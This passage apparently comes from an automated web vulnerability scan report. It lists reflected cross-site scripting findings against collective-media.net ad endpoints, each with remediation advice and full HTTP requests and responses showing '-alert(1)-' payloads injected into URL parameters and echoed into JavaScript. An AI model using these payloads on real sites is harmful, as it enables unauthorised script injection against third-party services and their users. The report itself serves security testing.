Connection: close
Content-Length: 7407

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("ns-47218449_1305034785","http://ad.doubleclick.net/adj/ns.knowyourmobile15b2d'-alert(1)-'fe3576fbb9c/general;net=ns;u=,ns-47218449_1305034785,11f8f328940989e,itdeweb,ns.i7kt-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1;;ppos=atf;kw=;tile=2;cmw=nurl;sz=728x90;net=ns;ord1=877377;contx=itdeweb;dc=w;btg
...[SNIP]...

4.42. http://a.collective-media.net/cmadj/ns.knowyourmobile/general [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/ns.knowyourmobile/general

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a16af'-alert(1)-'b14a62af70b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/ns.knowyourmobile/generala16af'-alert(1)-'b14a62af70b;ppos=atf;kw=;tile=2;sz=728x90;net=ns;ord=2513010054826736;ord1=877377;cmpgurl=http%253A//www.knowyourmobile.com/features/881740/google_io_what_to_expect.html? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.knowyourmobile.com/features/881740/google_io_what_to_expect.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:39:48 GMT
Connection: close
Content-Length: 7407

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("ns-13233545_1305034788","http://ad.doubleclick.net/adj/ns.knowyourmobile/generala16af'-alert(1)-'b14a62af70b;net=ns;u=,ns-13233545_1305034788,11f8f328940989e,itdeweb,ns.i7kt-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1;;ppos=atf;kw=;tile=2;cmw=nurl;sz=728x90;net=ns;ord1=877377;contx=itdeweb;dc=w;btg=ns.i7kt
...[SNIP]...

4.43. http://a.collective-media.net/cmadj/ns.knowyourmobile/general [ppos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/ns.knowyourmobile/general

Issue detail

The value of the ppos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88293'-alert(1)-'831d974abd0 was submitted in the ppos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/ns.knowyourmobile/general;ppos=88293'-alert(1)-'831d974abd0 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.knowyourmobile.com/features/881740/google_io_what_to_expect.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:38:47 GMT
Connection: close
Content-Length: 7325

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
chAd("ns-52450152_1305034727","http://ad.doubleclick.net/adj/ns.knowyourmobile/general;net=ns;u=,ns-52450152_1305034727,11f8f328940989e,none,ns.i7kt-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1;;ppos=88293'-alert(1)-'831d974abd0;contx=none;dc=w;btg=ns.i7kt;btg=dx.16;btg=dx.23;btg=dx.17;btg=mm.ag1;btg=mm.ak1;btg=mm.am1;btg=mm.aq1?","0","0",false);</scr'+'ipt>
...[SNIP]...

4.44. http://a.collective-media.net/cmadj/ns.slashgear/general [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/ns.slashgear/general

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c6a8a'-alert(1)-'d70f51146c9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadjc6a8a'-alert(1)-'d70f51146c9/ns.slashgear/general;ppos=atf;kw=;tile=1;dcopt=ist;sz=728x90;net=ns;ampc=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBGPgtMDrJTauSLMj0lAeZ-MGLBfKG-8sBAAAAEAEg3KOGAjgAWMKLheATYMmGhYmIpIQQsgERd3d3LnNsYXNoZ2Vhci5jb226AQlnZnBfaW1hZ2XIAQnaAVVodHRwOi8vd3d3LnNsYXNoZ2Vhci5jb20vc2Ftc3VuZy1nYWxheHktdGFiLTEwLTEtaGFuZHMtb24tYXQtZ29vZ2xlLWlvLTIwMTEtMDkxNTEwMjcvmAKIJ8ACAuACAOoCGFNsYXNoR2Vhci03Mjh4OTAtUHJpbWFyefgC8NEekAOkA5gDpAOoAwHgBAE%26num%3D0%26sig%3DAGiWqtzXozm10NV5RS71pypP48jN1u48ug%26client%3Dca-pub-3201252381583585%26adurl%3D;ord=8602318128105253;env=ifr;ord1=461219;cmpgurl=http%253A//www.slashgear.com/samsung-galaxy-tab-10-1-hands-on-at-google-io-2011-09151027/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.slashgear.com/banners/tier1_728x90.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:35:13 GMT
Connection: close
Content-Length: 7899

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("ns-33363457_1305034513","http://ad.doubleclick.net/adjc6a8a'-alert(1)-'d70f51146c9/ns.slashgear/general;net=ns;u=,ns-33363457_1305034513,11f8f328940989e,Miscellaneous,ns.i7kt-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1;;ppos=atf;kw=;tile=1;dcopt=ist;cmw=owl;sz=728x90;net=ns;click=
...[SNIP]...

4.45. http://a.collective-media.net/cmadj/ns.slashgear/general [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/ns.slashgear/general

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6d6cb'-alert(1)-'23ce3502b9c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/ns.slashgear6d6cb'-alert(1)-'23ce3502b9c/general;ppos=atf;kw=;tile=1;dcopt=ist;sz=728x90;net=ns;ampc=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBGPgtMDrJTauSLMj0lAeZ-MGLBfKG-8sBAAAAEAEg3KOGAjgAWMKLheATYMmGhYmIpIQQsgERd3d3LnNsYXNoZ2Vhci5jb226AQlnZnBfaW1hZ2XIAQnaAVVodHRwOi8vd3d3LnNsYXNoZ2Vhci5jb20vc2Ftc3VuZy1nYWxheHktdGFiLTEwLTEtaGFuZHMtb24tYXQtZ29vZ2xlLWlvLTIwMTEtMDkxNTEwMjcvmAKIJ8ACAuACAOoCGFNsYXNoR2Vhci03Mjh4OTAtUHJpbWFyefgC8NEekAOkA5gDpAOoAwHgBAE%26num%3D0%26sig%3DAGiWqtzXozm10NV5RS71pypP48jN1u48ug%26client%3Dca-pub-3201252381583585%26adurl%3D;ord=8602318128105253;env=ifr;ord1=461219;cmpgurl=http%253A//www.slashgear.com/samsung-galaxy-tab-10-1-hands-on-at-google-io-2011-09151027/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.slashgear.com/banners/tier1_728x90.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:35:16 GMT
Connection: close
Content-Length: 7899

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("ns-73419127_1305034516","http://ad.doubleclick.net/adj/ns.slashgear6d6cb'-alert(1)-'23ce3502b9c/general;net=ns;u=,ns-73419127_1305034516,11f8f328940989e,Miscellaneous,ns.i7kt-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1;;ppos=atf;kw=;tile=1;dcopt=ist;cmw=owl;sz=728x90;net=ns;click=http://adclic
...[SNIP]...

4.46. http://a.collective-media.net/cmadj/ns.slashgear/general [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/ns.slashgear/general

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2c4b'-alert(1)-'3beeb056928 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/ns.slashgear/generalb2c4b'-alert(1)-'3beeb056928;ppos=atf;kw=;tile=1;dcopt=ist;sz=728x90;net=ns;ampc=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBGPgtMDrJTauSLMj0lAeZ-MGLBfKG-8sBAAAAEAEg3KOGAjgAWMKLheATYMmGhYmIpIQQsgERd3d3LnNsYXNoZ2Vhci5jb226AQlnZnBfaW1hZ2XIAQnaAVVodHRwOi8vd3d3LnNsYXNoZ2Vhci5jb20vc2Ftc3VuZy1nYWxheHktdGFiLTEwLTEtaGFuZHMtb24tYXQtZ29vZ2xlLWlvLTIwMTEtMDkxNTEwMjcvmAKIJ8ACAuACAOoCGFNsYXNoR2Vhci03Mjh4OTAtUHJpbWFyefgC8NEekAOkA5gDpAOoAwHgBAE%26num%3D0%26sig%3DAGiWqtzXozm10NV5RS71pypP48jN1u48ug%26client%3Dca-pub-3201252381583585%26adurl%3D;ord=8602318128105253;env=ifr;ord1=461219;cmpgurl=http%253A//www.slashgear.com/samsung-galaxy-tab-10-1-hands-on-at-google-io-2011-09151027/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.slashgear.com/banners/tier1_728x90.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:35:21 GMT
Connection: close
Content-Length: 7899

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("ns-26243134_1305034521","http://ad.doubleclick.net/adj/ns.slashgear/generalb2c4b'-alert(1)-'3beeb056928;net=ns;u=,ns-26243134_1305034521,11f8f328940989e,Miscellaneous,ns.i7kt-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1;;ppos=atf;kw=;tile=1;dcopt=ist;cmw=owl;sz=728x90;net=ns;click=http://adclick.g.doub
...[SNIP]...

4.47. http://a.collective-media.net/cmadj/ns.slashgear/general [ppos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/ns.slashgear/general

Issue detail

The value of the ppos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0f86'-alert(1)-'bf7390dfd76 was submitted in the ppos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/ns.slashgear/general;ppos=b0f86'-alert(1)-'bf7390dfd76 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.slashgear.com/banners/tier1_728x90.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:34:23 GMT
Connection: close
Content-Length: 7320

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
dAttachAd("ns-34740352_1305034463","http://ad.doubleclick.net/adj/ns.slashgear/general;net=ns;u=,ns-34740352_1305034463,11f8f328940989e,none,ns.i7kt-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1;;ppos=b0f86'-alert(1)-'bf7390dfd76;contx=none;dc=w;btg=ns.i7kt;btg=dx.16;btg=dx.23;btg=dx.17;btg=mm.ag1;btg=mm.ak1;btg=mm.am1;btg=mm.aq1?","0","0",false);</scr'+'ipt>
...[SNIP]...

4.48. http://a.collective-media.net/cmadj/q1.philly/news [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.philly/news

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df7fe'-alert(1)-'4217b4f4195 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadjdf7fe'-alert(1)-'4217b4f4195/q1.philly/news;sz=300x600;net=q1;ord=[timestamp];ord1=158490;cmpgurl=http%253A//www.philly.com/philly/news/nation_world/121548659.html? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.philly.com/philly/news/nation_world/121548659.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:12:09 GMT
Connection: close
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 21:12:09 GMT
Content-Length: 7641

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-37153453_1305033129","http://ad.doubleclick.net/adjdf7fe'-alert(1)-'4217b4f4195/q1.philly/news;net=q1;u=,q1-37153453_1305033129,11f8f328940989e,polit,q1.polit_h-q1.none_h-q1.ent_h-q1.food_h-q1.sports_h-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_h-c
...[SNIP]...

4.49. http://a.collective-media.net/cmadj/q1.philly/news [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.philly/news

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a28f1'-alert(1)-'72417d38acc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.phillya28f1'-alert(1)-'72417d38acc/news;sz=300x600;net=q1;ord=[timestamp];ord1=158490;cmpgurl=http%253A//www.philly.com/philly/news/nation_world/121548659.html? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.philly.com/philly/news/nation_world/121548659.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:12:10 GMT
Connection: close
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 21:12:10 GMT
Content-Length: 7631

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-5554184_1305033130","http://ad.doubleclick.net/adj/q1.phillya28f1'-alert(1)-'72417d38acc/news;net=q1;u=,q1-5554184_1305033130,11f8f328940989e,polit,q1.polit_h-q1.none_h-q1.ent_h-q1.food_h-q1.sports_h-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_h-cm.sports_h;
...[SNIP]...

4.50. http://a.collective-media.net/cmadj/q1.philly/news [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.philly/news

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12520'-alert(1)-'7118891472a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.philly/news12520'-alert(1)-'7118891472a;sz=300x600;net=q1;ord=[timestamp];ord1=158490;cmpgurl=http%253A//www.philly.com/philly/news/nation_world/121548659.html? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.philly.com/philly/news/nation_world/121548659.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:12:11 GMT
Connection: close
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 21:12:11 GMT
Content-Length: 7633

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-47912472_1305033131","http://ad.doubleclick.net/adj/q1.philly/news12520'-alert(1)-'7118891472a;net=q1;u=,q1-47912472_1305033131,11f8f328940989e,polit,q1.polit_h-q1.none_h-q1.ent_h-q1.food_h-q1.sports_h-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_h-cm.sports_h;;sz=
...[SNIP]...

4.51. http://a.collective-media.net/cmadj/q1.philly/news [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.philly/news

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ecbe8'-alert(1)-'79f52d6e60a was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.philly/news;sz=ecbe8'-alert(1)-'79f52d6e60a HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.philly.com/philly/news/nation_world/121548659.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:11:54 GMT
Connection: close
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 21:11:54 GMT
Content-Length: 7611

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
